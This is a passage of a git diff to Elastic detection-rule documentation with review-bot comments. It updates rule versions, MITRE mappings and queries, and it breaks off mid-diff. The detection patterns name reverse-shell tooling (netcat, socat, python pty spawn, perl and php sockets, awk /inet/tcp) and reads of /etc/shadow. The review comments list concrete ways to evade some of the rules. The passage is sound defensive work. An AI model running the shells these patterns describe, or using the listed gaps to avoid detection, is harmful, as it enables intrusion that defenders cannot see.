@@ This rule identifies the execution of potentially malicious processes from a MOT - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query 
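Review bot: in the Suspicious Process Execution via Renamed PsExec Executable framework hunk, T1036.003 Rename System Utilities is a loose fit: that sub-technique describes renaming binaries that ship with the OS, and PsExec is a Sysinternals download, not a system utility. The parent T1036 Masquerading already added in this hunk is the accurate mapping; if a sub-technique is wanted, T1036.005 Match Legitimate Name or Location is closer to what a renamed PsExec service binary is doing. Nit on the MOTD investigation-guide hunk in the same range: the added line is a bare blank line at the end of the markdown block, which looks accidental.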
@@ -113,11 +114,29 @@ This rule identifies the execution of potentially malicious processes from a MOT [source, js] ---------------------------------- -process where host.os.type == "linux" and -event.type == "start" and event.action : ("exec", "exec_event") and -process.parent.executable : ("/etc/update-motd.d/*", "/usr/lib/update-notifier/*") and -process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "perl", "php*", "nc", "ncat", -"netcat", "socat", "lua", "java", "openssl", "ruby", "telnet") +process where event.type == "start" and event.action : ("exec", "exec_event") and +process.parent.executable : ("/etc/update-motd.d/*", "/usr/lib/update-notifier/*") and ( + (process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( + (process.args : ("-i", "-l")) or (process.parent.name == "socat" and process.parent.args : "*exec*"))) or + (process.name : ("nc", "ncat", "netcat", "nc.openbsd") and process.args_count >= 3 and + not process.args : ("-*z*", "-*l*")) or + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and process.args : "-r" and process.args : "*fsockopen*" and process.args : "*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name in ("openssl", "telnet")) +) and +not (process.parent.args : "--force" or process.args : ("/usr/games/lolcat", "/usr/bin/screenfetch")) ---------------------------------- 
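Review bot: in the Suspicious Process Spawned from MOTD Detected query hunk, the new query drops the `host.os.type == "linux"` predicate the old one had (it now starts `process where event.type == "start" and ...`). The parent-executable paths keep it Linux-only in practice, but every other Linux rule in this diff keeps the OS filter and it is what lets the engine skip non-Linux indices; put it back. Three tuning caveats the page should state: the netcat branch excludes any invocation whose arguments contain `-l` or `-z`, so a bind shell started from a MOTD script is not covered; the python, perl, ruby, lua and php branches only fire on inline code (`-c`, `-e`, `-rsocket`, `-r`), so a reverse shell saved to a file and run as `python3 /tmp/x.py` from update-motd.d does not match; and the `process.parent.args : "--force"` and `process.args : ("/usr/games/lolcat", "/usr/bin/screenfetch")` exclusions are attacker-controllable strings, so they should be documented as known false-positive suppressions rather than left unexplained in the query.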
diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc index 7012c16713..df01d48dff 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc @@ -35,7 +35,7 @@ Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Clien * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -87,3 +87,7 @@ any where host.os.type == "windows" and ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc index bad872a5fc..8a988bd819 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc @@ -38,7 +38,7 @@ Identifies remote access to the registry using an account with Backup Operators * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -112,6 +112,10 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan= ** Name: Security Account Manager ** ID: T1003.002 ** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: LSA Secrets +** ID: T1003.004 +** Reference URL: https://attack.mitre.org/techniques/T1003/004/ * Tactic: ** Name: Lateral Movement ** ID: TA0008 diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc index a59a88cbca..370ee17fb9 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc @@ -31,7 +31,7 @@ Identifies instances where VMware-related files, such as those with extensions l * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc index 447509f06f..d8deb5f7cf 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc @@ -31,7 +31,7 @@ Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc index 84ea14e55a..7041b14eed 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc @@ -29,7 +29,7 @@ Identifies scrobj.dll loaded into unusual Microsoft processes. This usually mean * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -79,3 +79,7 @@ sequence by process.entity_id with maxspan=2m ** Name: System Binary Proxy Execution ** ID: T1218 ** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc index 8bb5a2e14f..aa0f392c76 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc @@ -28,11 +28,12 @@ Identifies suspicious startup shell folder modifications to change the default S * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -141,3 +142,11 @@ registry where host.os.type == "windows" and ** Name: Registry Run Keys / Startup Folder ** ID: T1547.001 ** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc index 229dc0f141..3a7f2245c5 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of a symbolic link to a suspicious file or location. A s * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -46,8 +46,8 @@ Identifies the creation of a symbolic link to a suspicious file or location. A s [source, js] ---------------------------------- -process where host.os.type == "linux" and event.action in ("exec", "exec_event") and -event.type == "start" and process.name == "ln" and +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +event.type == "start" and process.name == "ln" and process.args in ("-s", "-sf") and ( /* suspicious files */ (process.args in ("/etc/shadow", "/etc/shadow-", "/etc/shadow~", "/etc/gshadow", "/etc/gshadow-") or diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc index d056e6b632..a5341f279e 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc 
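Review bot: in the Suspicious Symbolic Link Created query hunk, `process.args in ("-s", "-sf")` is an exact match, so `ln -fs /etc/shadow /tmp/s`, `ln -sn`, `ln -snf` and `ln --symbolic` all evade the rule while doing exactly what it is meant to catch. Use a wildcard on the short option cluster plus the long form, for example `process.args : ("-*s*", "--symbolic")`, and say on the page that the rule now requires a symlink flag (before this change any `ln` against the listed files matched, including hard links).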
@@ -3,7 +3,7 @@ Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -29,7 +29,7 @@ Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 103 *Rule authors*: @@ -71,9 +71,8 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -file where host.os.type == "linux" and event.action in ("opened-file", "read-file", "wrote-to-file") and -file.path : ("/etc/sysctl.conf", "/etc/sysctl.d", "/etc/sysctl.d/*") and -not process.name in ("auditbeat", "systemd-sysctl", "dpkg", "dnf", "yum", "rpm", "apt") +host.os.type:linux and event.category:file and event.action:("opened-file" or "read-file" or "wrote-to-file") and +file.path : ("/etc/sysctl.conf" or "/etc/sysctl.d" or /etc/sysctl.d/*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc index 594e9a3d8d..fada295d14 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc 
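Review bot: in the Suspicious Sysctl File Event query hunk, the same concern as the modprobe page applies: the EQL-to-new_terms conversion removes the `process.name` exclusions (auditbeat, systemd-sysctl, dpkg, dnf, yum, rpm, apt) without the page saying which new-terms fields or history window now replace them. Document both, and confirm the history window spans at least one boot cycle, because systemd-sysctl reads these files on every boot and a host that has not rebooted within the window will alert on its next one.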
@@ -31,7 +31,7 @@ This rule monitors for the execution of several commonly used system commands ex * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 103 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc index 05cdd03182..e7fd8fbf76 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc @@ -31,7 +31,7 @@ Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are * Tactic: Impact * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc new file mode 100644 index 0000000000..e7efabfb3f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc 
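Review bot: in the Suspicious System Commands Executed by Previously Unknown Executable hunk, the version jumps from 2 to 103 but the only change shown is the version line. In this rule set a +100 bump accompanies a rule-type change (the modprobe and sysctl pages in this same diff go 3 -> 103 together with `eql` -> `new_terms`). Either this page's rule-type line should also have changed and is missing from the diff, or the version is wrong; check the rule source and make the page match.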
@@ -0,0 +1,74 @@ +[[suspicious-troubleshooting-pack-cabinet-execution]] +=== Suspicious Troubleshooting Pack Cabinet Execution + +Identifies the execution of the Microsoft Diagnostic Wizard to open a diagcab file from a suspicious path and with an unusual parent process. This may indicate an attempt to execute malicious Troubleshooting Pack Cabinet files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + (process.name : "msdt.exe" or process.pe.original_file_name == "msdt.exe") and process.args : "/cab" and + process.parent.name : ( + "firefox.exe", "chrome.exe", "msedge.exe", "explorer.exe", "brave.exe", "whale.exe", "browser.exe", + "dragon.exe", "vivaldi.exe", "opera.exe", "iexplore", "firefox.exe", "waterfox.exe", "iexplore.exe", + "winrar.exe", "winrar.exe", "7zFM.exe", "outlook.exe", "winword.exe", "excel.exe" + ) and + process.args : ( + "?:\\Users\\*", + "\\\\*", + "http*", + "ftp://*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ 
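Review bot: in the new Suspicious Troubleshooting Pack Cabinet Execution query, the `process.parent.name` list contains `firefox.exe` twice, `winrar.exe` twice, and both `iexplore` and `iexplore.exe`; the bare `iexplore` can never equal a process name and should go, along with the duplicates. Two smaller points: the query uses `event.action == "start"` where every other process rule on this page uses `event.type == "start"`, so pick one so this rule sees the same events as its siblings; and since the `http*`, `ftp://*` and `\\\\*` argument patterns mean the rule also covers remote and UNC-hosted .diagcab files, the description's "from a suspicious path" undersells what it detects and should say so.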
diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc index 63e446ae37..7079b3961e 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc @@ -31,7 +31,7 @@ This rule monitors for the execution of suspicious linux tools through ProxyChai * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc index ef394544f7..50de714563 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc @@ -35,10 +35,12 @@ A suspicious WerFault child process was detected, which may indicate an attempt * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -81,3 +83,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc index 49443ed6dc..0a4e703874 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc @@ -24,13 +24,13 @@ This rule monitors for the usage of the which command with an unusual amount of *Tags*: * Domain: Endpoint -* OS: Windows +* OS: Linux * Use Case: Threat Detection * Tactic: Discovery * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..0cc632455b --- /dev/null 
+++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc 
@@ -0,0 +1,59 @@ +[[suspicious-windows-process-cluster-spawned-by-a-host]] +=== Suspicious Windows Process Cluster Spawned by a Host + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..ddceb7e330 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc 
@@ -0,0 +1,61 @@ +[[suspicious-windows-process-cluster-spawned-by-a-parent-process]] +=== Suspicious Windows Process Cluster Spawned by a Parent Process + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** 
Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..7c6d836647 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc 
@@ -0,0 +1,61 @@ +[[suspicious-windows-process-cluster-spawned-by-a-user]] +=== Suspicious Windows Process Cluster Spawned by a User + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: 
https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc index c98064c9da..f1fe7111c2 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc @@ -29,9 +29,10 @@ Identifies WMIC allowlist bypass techniques by alerting on suspicious execution * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -65,3 +66,11 @@ sequence by process.entity_id with maxspan = 2m ** Name: XSL Script Processing ** ID: T1220 ** Reference URL: https://attack.mitre.org/techniques/T1220/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc index 3f1ba26333..5305137091 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc @@ -30,11 +30,12 @@ A suspicious Zoom child process was detected, which may indicate an attempt to r * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -125,3 +126,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc index 26ca5c9c77..54aeccc7a0 100644 --- a/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc @@ -39,7 +39,7 @@ Identifies the creation of symbolic links to a shadow copy. Symbolic links can b * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -136,3 +136,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: OS Credential Dumping ** ID: T1003 ** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc index 7b14911285..c46c86b71a 100644 --- a/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the copying or moving of a system binary to a suspicious * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -45,7 +45,7 @@ This rule monitors for the copying or moving of a system binary to a suspicious ---------------------------------- sequence by host.id, process.entity_id with maxspan=1s [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and - process.name in ("cp", "mv", "cat") and process.args : ( + process.name in ("cp", "mv") and process.args : ( // Shells "/bin/*sh", "/usr/bin/*sh", @@ -63,10 +63,10 @@ sequence by host.id, process.entity_id with maxspan=1s "/usr/bin/mknod", "/bin/ping*", "/usr/bin/ping*", "/bin/nmap", "/usr/bin/nmap", // System utilities - "/bin/ls", "/usr/bin/ls", "/bin/cat", "/usr/bin/cat", "/bin/mv", "/usr/bin/mv", "/bin/cp", "/usr/bin/cp", - "/bin/sudo", "/usr/bin/sudo", "/bin/curl", "/usr/bin/curl", "/bin/wget", "/usr/bin/wget", "/bin/tmux", - "/usr/bin/tmux", "/bin/screen", "/usr/bin/screen", "/bin/ssh", "/usr/bin/ssh", "/bin/ftp", "/usr/bin/ftp" - )] + "/bin/ls", "/usr/bin/ls", "/bin/cat", "/usr/bin/cat", "/bin/sudo", "/usr/bin/sudo", "/bin/curl", "/usr/bin/curl", + "/bin/wget", "/usr/bin/wget", "/bin/tmux", "/usr/bin/tmux", "/bin/screen", "/usr/bin/screen", "/bin/ssh", + "/usr/bin/ssh", "/bin/ftp", "/usr/bin/ftp" + 